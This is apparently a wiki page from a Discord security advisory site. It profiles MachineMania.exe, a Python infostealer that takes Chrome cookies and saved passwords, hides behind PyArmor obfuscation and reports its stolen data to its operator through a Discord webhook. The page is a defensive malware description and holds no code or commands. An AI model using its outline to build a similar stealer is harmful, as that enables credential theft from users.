MachineMania

From Discord Security Advisory
Revision as of 00:13, 4 October 2021 by 148.255.226.56 (talk) (→‎Distributions: Removed wikitable for webhooks (if we start logging these, there'll be too many))
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

MachineMania (distributed as MachineMania.exe) is payload that steals cookies and password combinations from the Google Chrome browser. While it has been seen distributed as a standalone executable, it is most often found as a second-stage payload[1] of the Node Bootstrapper malware.

MachineMania.exe
Language Python
Obfuscation PyArmor (Super Mode)
Behvaior Browser secrets
Lasting Effects None observed
Send Method Discord Webhook (through run argument)

Appearances

Distributions

MachineMania.exe has been distributed as a standalone executable, but has also been called as an additional payload in distributions of the Node Bootstrapper executable.

Internals

Obfuscation

The executable is made with PyInstaller and obfuscated with PyArmor in Super Mode.

Behavior

MachineMania.exe will silently run in the background and collect password and cookies from the Google Chrome browser only, although other Chromium browsers do not seem to be affected as its scope is deliberately cut by what appears to be a paywall.

MachineMania.exe webhook message
The message sent to the malware operator via a Discord webhook

Lasting Effects

MachineMania has not been observed to leave any lasting effects such as keyloggers or embedded JavaScript. After it has sent its stolen data, it will simply close itself. If it cannot find Chrome, it will crash.

References